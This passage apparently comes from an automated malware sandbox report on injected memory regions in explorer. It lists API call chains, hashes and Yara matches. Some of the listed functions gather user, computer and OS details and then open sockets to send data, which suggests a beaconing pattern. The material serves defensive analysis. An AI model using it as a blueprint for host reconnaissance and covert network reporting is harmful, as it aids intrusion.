                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isprint$strstr
                                                                                                                                                                                                                        • String ID: DELETE$GET$PATCH$POST$PUT
                                                                                                                                                                                                                        • API String ID: 1066184663-1590512397
                                                                                                                                                                                                                        • Opcode ID: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction ID: 1dfb9e74ca4fc2dc105176cbbb0a75f7ea08265d4e977d74b2f631827c15d22b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213566e0c594fa46ebec85404c69b5829d0866ebd49a4250a26f2a22a0e008b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041D727708B8585DB208F25F4403BABBA5FB89B54FC45225DE8A4375AEB7CE095D700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA4550: isdigit.MSVCRT ref: 0DFA4577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0DFA4408
                                                                                                                                                                                                                          • Part of subcall function 0DFA41F0: malloc.MSVCRT ref: 0DFA4200
                                                                                                                                                                                                                          • Part of subcall function 0DFA41F0: free.MSVCRT ref: 0DFA4220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFA4489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFA448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0DFA44AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0DFA450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: 5b7e74a6e8936d41797c2edcfb5c2c181b13c0f5406ed802fdd45674572bfb13
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF41D0B2604B518AEB21DF6DE84472A7BA5F384B91F01C026DE4A43764EFBDC585CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E104550: isdigit.MSVCRT ref: 0E104577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0E104408
                                                                                                                                                                                                                          • Part of subcall function 0E1041F0: malloc.MSVCRT ref: 0E104200
                                                                                                                                                                                                                          • Part of subcall function 0E1041F0: free.MSVCRT ref: 0E104220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0E104489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0E10448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0E1044AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0E10450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: a5b175af7a75fe032db69ef4f636ed181c6dc0c3ba6eef601422614f894045e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8241F4B2614B9186EB21DF22E99471E77E1F748B90F418416EF5643798EBBCC8C1CB80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF44550: isdigit.MSVCRT ref: 0FF44577
                                                                                                                                                                                                                        • tolower.MSVCRT ref: 0FF44408
                                                                                                                                                                                                                          • Part of subcall function 0FF441F0: malloc.MSVCRT ref: 0FF44200
                                                                                                                                                                                                                          • Part of subcall function 0FF441F0: free.MSVCRT ref: 0FF44220
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0FF44489
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0FF4448F
                                                                                                                                                                                                                        • strtod.MSVCRT ref: 0FF444AD
                                                                                                                                                                                                                        • _errno.MSVCRT ref: 0FF4450A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3554981057-0
                                                                                                                                                                                                                        • Opcode ID: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction ID: d9f4933f81488437c749449d55806edc85911c5d9845b773f9db8f69372f129a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d2701cea738920341e3a52050b7ddd05ed3a8acd51b9ba41066ba7dd9ea7312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2941D072604B5286EB21DF21E84472A7AA1FB84FD0F818122DE5657B59EF3DE085CB80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetWindowsDirectoryA.KERNEL32 ref: 0E109B7C
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: GetVolumeInformationA.KERNEL32 ref: 0E109BC6
                                                                                                                                                                                                                          • Part of subcall function 0E109B30: wsprintfA.USER32 ref: 0E109C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E1091C0: EnterCriticalSection.KERNEL32 ref: 0E1091CB
                                                                                                                                                                                                                          • Part of subcall function 0E1091C0: LeaveCriticalSection.KERNEL32 ref: 0E1091FB
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10703C
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: recv.WS2_32 ref: 0E1070A3
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcmpiA.KERNEL32 ref: 0E107103
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107127
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: StrStrA.SHLWAPI ref: 0E10713F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcmpiA.KERNEL32 ref: 0E10715E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: strtol.MSVCRT ref: 0E107176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcpyA.KERNEL32 ref: 0E106E6E
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E7F
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106E93
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EA7
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EB8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106ECC
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106EEA
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: wsprintfA.USER32 ref: 0E106F02
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F16
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F2A
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrcatA.KERNEL32 ref: 0E106F66
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: WSAStartup.WS2_32 ref: 0E106F76
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: socket.WS2_32 ref: 0E106F92
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: gethostbyname.WS2_32 ref: 0E106FA9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: memcpy.MSVCRT ref: 0E106FC9
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: htons.WS2_32 ref: 0E106FD8
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: connect.WS2_32 ref: 0E106FEF
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: lstrlenA.KERNEL32 ref: 0E107005
                                                                                                                                                                                                                          • Part of subcall function 0E106E10: send.WS2_32 ref: 0E10701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: 1e0a4efa4fab683054b989449d7614d36b05457d309474721dfd2c9f1b591178
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E5128B1316BC0A6EB00DB22F85439A73E5F788B94F500815DA8E97BA4DF7CC599CB41
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetWindowsDirectoryA.KERNEL32 ref: 0FF49B7C
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: GetVolumeInformationA.KERNEL32 ref: 0FF49BC6
                                                                                                                                                                                                                          • Part of subcall function 0FF49B30: wsprintfA.USER32 ref: 0FF49C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF491C0: EnterCriticalSection.KERNEL32 ref: 0FF491CB
                                                                                                                                                                                                                          • Part of subcall function 0FF491C0: LeaveCriticalSection.KERNEL32 ref: 0FF491FB
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4703C
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: recv.WS2_32 ref: 0FF470A3
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcmpiA.KERNEL32 ref: 0FF47103
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47127
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: StrStrA.SHLWAPI ref: 0FF4713F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcmpiA.KERNEL32 ref: 0FF4715E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: strtol.MSVCRT ref: 0FF47176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcpyA.KERNEL32 ref: 0FF46E6E
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E7F
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46E93
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EA7
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EB8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46ECC
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46EEA
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: wsprintfA.USER32 ref: 0FF46F02
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F16
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F2A
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrcatA.KERNEL32 ref: 0FF46F66
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: WSAStartup.WS2_32 ref: 0FF46F76
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: socket.WS2_32 ref: 0FF46F92
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: gethostbyname.WS2_32 ref: 0FF46FA9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: memcpy.MSVCRT ref: 0FF46FC9
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: htons.WS2_32 ref: 0FF46FD8
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: connect.WS2_32 ref: 0FF46FEF
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: lstrlenA.KERNEL32 ref: 0FF47005
                                                                                                                                                                                                                          • Part of subcall function 0FF46E10: send.WS2_32 ref: 0FF4701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1973528353-0
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: 4dd38fde4c5667a35ad55528c40b655ea33c1a55b9e2eacc13a5edab2e9d7c4f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451D135605B4785EB20DB25E89437A77A4FB89BC4F800236DA8987B24DF7CD15BDB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: a80589b90b621c0618080cd88d681040ccaf4018dd47b05b026ee75687cf3ab5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C316679269D4A8FFB78EB58ECA4B7933E0F758329F54A1188609C21E1CE3CD4569700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: cab110a2110d980ed3924558977509681009355a94354ae22844ecfa3d8386b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48317678279D5B8FEBECEB58D8A4B6932A0F758317F54501C8615C22A0CE3C949B9B10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2288870239-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: 5b734d5a0f6c52a041d3e03d1f4d79bf759c63d767782e29b10bbc9178888bf7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2314634269D5E8FFFB8EF98E8B4BA932E0F758355F5884198509C31A0CF3C9856A741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0E10AA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0E10AA63
                                                                                                                                                                                                                          • Part of subcall function 0E10A350: WideCharToMultiByte.KERNEL32 ref: 0E10A393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0E10AA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0E10AA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0E10AAED
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: EnterCriticalSection.KERNEL32 ref: 0E108FE8
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: RtlInitializeCriticalSection.NTDLL ref: 0E108FF5
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10902A
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcpyA.KERNEL32 ref: 0E10904D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10905D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrcatA.KERNEL32 ref: 0E10906D
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: LeaveCriticalSection.KERNEL32 ref: 0E1090F4
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: memcpy.MSVCRT ref: 0E10910C
                                                                                                                                                                                                                          • Part of subcall function 0E108FA0: lstrlenA.KERNEL32 ref: 0E10911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0E10AB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        • Opcode ID: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction ID: 9707e8539c9c314c79902ddecb549d58be026afb700705644e1d55ad29089d01
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69417F72614B809AE720DF71E8443DEB7A4FB88788F844416EB4D57B98DFB9C645CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0FF4AA49
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0FF4AA63
                                                                                                                                                                                                                          • Part of subcall function 0FF4A350: WideCharToMultiByte.KERNEL32 ref: 0FF4A393
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0FF4AA8C
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0FF4AA9D
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0FF4AAED
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: EnterCriticalSection.KERNEL32 ref: 0FF48FE8
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: RtlInitializeCriticalSection.NTDLL ref: 0FF48FF5
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4902A
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcpyA.KERNEL32 ref: 0FF4904D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4905D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrcatA.KERNEL32 ref: 0FF4906D
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: LeaveCriticalSection.KERNEL32 ref: 0FF490F4
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: memcpy.MSVCRT ref: 0FF4910C
                                                                                                                                                                                                                          • Part of subcall function 0FF48FA0: lstrlenA.KERNEL32 ref: 0FF4911A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0FF4AB01
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.6
                                                                                                                                                                                                                        • API String ID: 2800961625-471037017
                                                                                                                                                                                                                        • Opcode ID: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction ID: 71c7f0091db432393197cef76ed86e7ae2800236ba2ff78fb2312a45266380fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf8951c5f05f57b087d243209f13a07d60f62d93e5cc917ee797ccb51e54963
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93413332614B919AE720DF61D8443EE77A5FB88788F844115EA4D47E68EF7DC249CB40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFC4972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0DFC499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFC49FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC494F
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _getptd_noexit.LIBCMT ref: 0DFC28A2
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _amsg_exit.LIBCMT ref: 0DFC28B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC4A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFC4A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
